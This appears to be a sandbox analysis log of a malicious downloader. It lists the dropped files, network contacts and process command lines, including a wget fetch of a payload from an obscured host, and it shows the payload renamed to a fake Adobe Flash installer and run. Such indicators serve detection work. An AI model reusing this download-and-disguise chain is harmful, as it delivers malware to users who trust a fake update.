Technical Information
- '' (downloaded from the Internet)
- %TEMP%\scohp.cmd
- %TEMP%\2387967457.dat
- %TEMP%\wget.exe
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- %TEMP%\$inst\2.tmp
- %TEMP%\$inst\temp_0.tmp
- from %TEMP%\2387967457.dat to %TEMP%\AdobeFlash28.0.0.36.exe
- 'bl##ave.com':80
- 'get.adobe.com':80
- 'localhost':1038
- http://bl##ave.com/images/promotions/2387967457.dat
- http://get.adobe.com/flashplayer
- DNS ASK bl##ave.com
- DNS ASK get.adobe.com
- ClassName: 'MS_AutodialMonitor' WindowName: ''
- ClassName: 'MS_WebcheckMonitor' WindowName: ''
- ClassName: '' WindowName: ''
- ClassName: 'IEFrame' WindowName: ''
- '%TEMP%\AdobeFlash28.0.0.36.exe'
- '%TEMP%\wget.exe' http://bl##ave.com/images/promotions/2387967457.dat
- '%ProgramFiles%\Internet Explorer\IEXPLORE.EXE' -nohome
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\scohp.cmd" "